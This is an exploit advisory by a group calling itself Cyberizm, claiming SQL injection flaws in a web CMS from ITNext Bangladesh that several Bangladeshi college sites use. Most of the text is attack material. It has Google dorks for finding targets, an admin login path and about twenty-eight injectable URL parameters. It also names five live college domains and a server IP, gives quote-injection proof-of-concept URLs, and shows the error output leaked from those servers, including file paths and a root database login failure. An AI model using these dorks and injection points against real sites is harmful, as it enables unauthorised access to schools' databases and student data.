################################################################### # Exploit Title : Powered By ITNext Bangladesh Solutions Limited SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 08/01/2019 # Vendor Homepage : itnext.com.bd ~ edu-bd.org # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''This is Web-App Not Only A Website!!! Powered By ITNext>>'' site:edu.bd intext:''Powered By ITNext>>'' site:edu.bd # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-itnext-bangladesh-solutions-limited-sql-injection.html ################################################################### # Admin Panel Login Path : ************************* /index.php?cat=quicklink&del=login # SQL Injection Exploits : *********************** /admission/index.php?cat=[SQL Injection] /index.php?cat=quicklink&del=[SQL Injection] /index.php?cat=Home&del=[SQL Injection] /index.php?cat=Principal&del=[SQL Injection] /index.php?cat=Vice%20Principal&del=[SQL Injection] /index.php?cat=Teachers&del=[SQL Injection] /index.php?cat=Students&del=[SQL Injection] /index.php?cat=Brief%20History&del=[SQL Injection] /index.php?cat=Tuition%20Fees&del=[SQL Injection] /index.php?cat=Attendence&del=[SQL Injection] /index.php?cat=List%20of%20Holiday&del=[SQL Injection] /index.php?cat=Class%20Schedule&del=[SQL Injection] /index.php?cat=Academic%20Calander&del=[SQL Injection] /index.php?cat=Admission%20Fees&del=[SQL Injection] /index.php?cat=Admission%20Open&del=[SQL Injection] /index.php?cat=Laboratory&del=[SQL Injection] /index.php?cat=Computer%20Lab&del=[SQL Injection] /index.php?cat=College%20Library&del=[SQL Injection] /index.php?cat=ACADEMIC&del=[SQL Injection] /index.php?cat=ADMISSION&del=[SQL Injection] /index.php?cat=Check%20Dues&del=[SQL Injection] /index.php?cat=Online%20Payments&del=[SQL Injection] /index.php?cat=News%20Corner&del=[SQL Injection] /index.php?cat=Notice%20Board&del=[SQL Injection] /index.php?cat=Photo%20Gallery&del=[SQL Injection] /index.php?cat=Email%20Us&del=[SQL Injection] /index.php?cat=Find%20Us&del=[SQL Injection] ################################################################### # Example Vulnerable Sites => *************************** Note => (107.155.116.175) => There are 14 domains hosted on this server. [+] mohsincollege.edu.bd/index.php?cat=quicklink&del=1%27 => [ Proof of Concept for SQL Injection ] => archive.vn/xBSoT [+] ramucollege.edu.bd/admission/index.php?cat=1' [+] bakoliagovcollege.edu.bd/index.php?cat=quicklink&del=1%27 [+] pol-inst-cmp.edu.bd/index.php?cat=quicklink&del=1%27 [+] cgc.edu.bd/index.php?cat=quicklink&del=1%27 ################################################################### # SQL Database Error : ********************* Warning: include(pages/1'.php): failed to open stream: No such file or directory in /home/mcollege/public_html/index.php on line 426 Warning: include(): Failed opening 'pages/1'.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/mcollege/public_html/index.php on line 426 Warning: mysql_connect(): Access denied for user 'root'@'localhost' (using password: YES) in /home/ramucollege/public_html/admission/db_connect.php on line 22 ################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###################################################################